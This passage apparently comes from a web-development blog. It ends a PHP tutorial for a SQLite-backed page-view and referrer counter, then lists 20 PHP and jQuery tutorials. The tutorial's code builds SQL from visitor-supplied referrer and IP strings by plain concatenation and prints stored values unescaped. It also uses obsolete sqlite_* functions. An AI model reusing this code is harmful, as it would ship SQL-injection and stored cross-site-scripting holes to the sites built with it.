It means that 5 referrals came from http://www.noupe.com and 10 came from http://css-tricks.com. This format saves space and is easy to parse as web statistics.

Now for the final few lines:

# Update the number of views
$views++;

# If we did obtain information from the database
# (the database already contains some information about this page)
if( $flag )
	# Update it
	$sqlCmd = 'UPDATE stats SET ip=\''.$ips.'\', views=\''.$views.'\', referrer=\''.$referrers.'\' WHERE page=\''.$page.'\'';

# Otherwise
else
	# Insert a new value into it
	$sqlCmd = 'INSERT INTO stats(page, ip, views, referrer) VALUES (\''.$page.'\', \''.$ips.'\',\''.$views.'\',\''.$referrers.'\')';

# Execute the commands
sqlite_exec( $handle, $sqlCmd );

That’s all there is to it for process.php. As a review, it finds the IP Address and Referrer of the visitor, uses the values to create two Strings, increases the number of views of the page by one, and places all of these values into the database.

There is now only one task left. We have to display the web statistics. Let’s call the following file display.php:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Web Statistics Display</title>
</head>
<body>

<?php
	# Open up the database
	$handle = sqlite_open( $_SERVER['DOCUMENT_ROOT'].'/stats.db', 0666, $sqliteError ) or die( $sqliteError );

	# Get all the statistics
	$sqlGet = 'SELECT * FROM stats';
	$result = sqlite_query( $handle, $sqlGet );

	# Create an unordered list
	echo "<ul>\n";

	# If there are results
	if( $result ) {
		$page_views = 0;
		$unique_visitors = 0;

		# Fetch them
		while( ($info = sqlite_fetch_array( $result ) ) ) {
			# Get the page, views, IPs, and referrers
			$page = $info['page'];
			$views = $info['views'];
			$ips = $info['ip'];
			$referrers = $info['referrer'];

			# Print out a list element with the $page/$views information
			if( $views == 1 )
				echo "\t<li>\n\t\t<p>$page was viewed $views time:</p>\n";
			else
				echo "\t<li>\n\t\t<p>$page was viewed $views times:</p>\n";

			# Update the number of page views
			$page_views += $views;

			# Parse the data of IPs and Referrers using process.php's code
			preg_match_all( '%(\d+)\((.*?)\)%', $ips, $matches );

			# Find the size of the data
			$size = count( $matches[1] );

			# Create a sub list
			echo "\t\t<ul>\n";

			# Loop through all the IPs
			for( $i = 0; $i < $size; $i++ ) {
				# Find the number of visits
				$num = $matches[1][$i];

				# Find the IP address
				$ip = $matches[2][$i];

				# Print the info in a list element
				if( $num == 1 )
					echo "\t\t\t<li>$num time by $ip</li>\n";
				else
					echo "\t\t\t<li>$num times by $ip</li>\n";

				# Update the number of unique visitors
				$unique_visitors++;
			}

			# Repeat the whole process for referrers
			preg_match_all( '%(\d+)\((.*?)\)%', $referrers, $matches );
			$size = count( $matches[1] );

			# Loop through each one
			for( $i = 0; $i < $size; $i++ ) {
				$num = $matches[1][$i];
				$referrer = $matches[2][$i];

				# Print out the info
				if( $num == 1 )
					echo "\t\t\t<li>$num referral by $referrer</li>\n";
				else
					echo "\t\t\t<li>$num referrals by $referrer</li>\n";
			}

			# End the sub-list
			echo "\t\t</ul>\n";

			# End the list element
			echo "\t</li>\n";
		}

		echo "\t<li>Total unique visitors: $unique_visitors</li>\n";
		echo "\t<li>Total page views: $page_views</li>\n";
	}

	# End the unordered list
	echo "</ul>\n";

	# Close the database
	sqlite_close($handle);
?>

</body>
</html>

It may seem daunting, but it is very similar to process.php. It parses the page, views, ip addresses, and referrers from the database. It then continues to output these in an unordered list format.

The final output is as follows:

View Demo of your Own Stats Program

Thank you for reading and good luck!

  

Web applications have made huge leaps and bounds in improving user experience thanks to a lot of recently developed Ajax technology. When you combine some neat functionality courtesy of PHP with the cleverness of jQuery you can produce some pretty neat effects. In an effort to help you take it up a notch, we’d like to share some methods for helping your site anticipate a user’s next move.

The post below is made up of the best 20 PHP + jQuery Components and Tutorials that you will likely need in many of your projects, they are all of the highest quality and more or less easy to configure. Give them a try.

1. Directory Trees With PHP And jQuery

A simple way to keep track of many files is to use a directory tree. A directory tree lists out files and directories so that it’s easy to find what you’re looking for. In this tutorial, you will learn how to create a directory tree using PHP and jQuery.

Check out the Demo Here

2. Create a Photo Admin Site Using PHP and jQuery

A sceencast tutorial for creating a photo site using PHP, jQuery, and AJAX. You will learn how to retrieve images from a database, create a simple login form with authentication, and then allow for the database to be asynchronously updated.

3. Asynchronous Comments with PHP, jQuery, and JSON

In this article, learn how to create a simple but effective means of capturing and displaying visitor comments using a blend of jQuery, PHP and JSON. In the public forum that is the blogosphere, the ability to capture and display visitor comments on your blogs can give you instant feedback and opinions from the people that matter most – those that read your blog.

Check out the Demo Here

4. PHP ajax login form using Jquery

Create a new PHP ajax login functionality using Jquery. You can easliy switch the data source between database and PHP array, login authentication can be using username or email, or even both of ‘em by changing the config, automattic redirection could be done within the javascript config.

Check out the Demo Here

5. PHP + jQuery Todo List Part 1, part2

This is part 1 of a 2 part series on making a Todo List with PHP and enhancing it with jQuery’s AJAX and manipulation capabilities.

Check out the Demo Here

6. Newsletter module

A PHP, jQuery and AJAX module, which should be great for any newsletter management needs. You just need to copy one file onto your site, and you’re ready to send and archive all newsletters, manage e-mail addresses and categories, and configure a template for your e-mails. Also have an ability of optional password protection. All options can be easily configured at the top of included .php file.

Check out the Demo Here

7. From PHP to XML to jQuery and Ajax

This tutorial will focus on getting data from a database using PHP, converting that to an XML document, and reading that XML in through jQuery via Ajax calls. Seems complex, but is in fact, very easy.

Check out the Demo Here

8. How to Validate Forms in both sides using PHP and jQuery

We are going to learn how to validate your forms using PHP and jQuery in both sides: client side (using javascript with jQuery) and server side (using PHP). It will be interesting to see how to use regular expressions to validate different kind of e-mails, passwords and more.

Check out the Demo Here

9. Create a shoutbox using PHP and AJAX

We will learn how to create a dynamic ajax based shoutbox with jQuery from scratch. It will be very interesting to know how to use the ajax function of jQuery and how it can be used to insert and recover data from a MySQL database via PHP in a way asynchronous.

Check out the Demo Here

10. HOWTO: PHP and jQuery upload progress bar

With the controllable jQuery Progress Bar, writing a form upload progress bar seems like a piece of cake now. Hypothetically, all we need is to create the bar, poll for the progress of the file upload, drive the new progress bar value (in percentage) and set it using PHP.

Check out the Demo Here

11. Auto-Complete Field with jQuery, JSON & PHP

Using jQuery with PHP to create auto complete field, beside the auto-complete code we need the jQuery library along with its Dimensions plug-in.

12. A fancy Apple.com-style search suggestion

Learn how to recreate the effect from Apple website by creating a fancy apple.com-style search suggestion. This example makes use of several techniques: MySQL (for the database), HTML/CSS for styling, PHP for retrieving the data and jQuery for the AJAX request.

Check out the Demo Here

13. PHP & jQuery image upload and crop v1.2

Create a PHP and jQuery image upload and crop tool using PHP, jQuery, PHP GD Library and Image Area Select.

Check out the Demo Here

14. FlickrScrollr

FlickrScrollr is a combination of PHP and jQuery that parses a Flickr RSS feed and creates an animated thumbnail display.

Check out the Demo Here

15. Reddit-style Voting With PHP, MySQL And jQuery

If you are a regular at Reddit, you must have noticed the way people vote there. You can either vote up or vote down. This tutorial will show you how to create such a voting system with jQuery, PHP and MySQL.

Check out the Demo Here

16. SMTP Feedback Mail class with jQuery Slide Effect

This post is about feedback mail with nice slide effect using php SMTP class and jQuery. It’s very useful to add contact/feedback page to your php websites.

Check out the Demo Here

17. Ajax Add a Record with Button Status Change using jQuery

If you like Facebook and Twitter API method of clicking follow, add a friend button. Where you click the button, the button status changed to ‘You following’ and ‘Remove’ at the same time request inserted into database. This tutorial will show you how to do it.

Check out the Demo Here

18. Refreshing an element at a set time interval using jQuery and a sprinkle of Ajax

Now lets say that you a web page that has a big Block of “something” and inside this “something” you would like to have some information change at a set time interval. Well with Jquery, some PHP and a sprinkle of Ajax, you can get this done quick fast and in a hurry.

Check out the Demo Here

19. CakePHP Ajax “Quick Save” with jQuery

When you are in an administration panel, sometimes you want a “quick save” feature that allows you to save without leaving the page. Here is how to accomplish this with CakePHP and jQuery.

20. PHP / jQuery Image Replacement

This is a tiny plugin that, in combination with a separate server-side script, dynamically replaces the text of an element with an image, generated using fonts you specify. This allows you to use beautiful text in headings without having to manually produce images in Photoshop, GIMP, or similar.

Check out examples here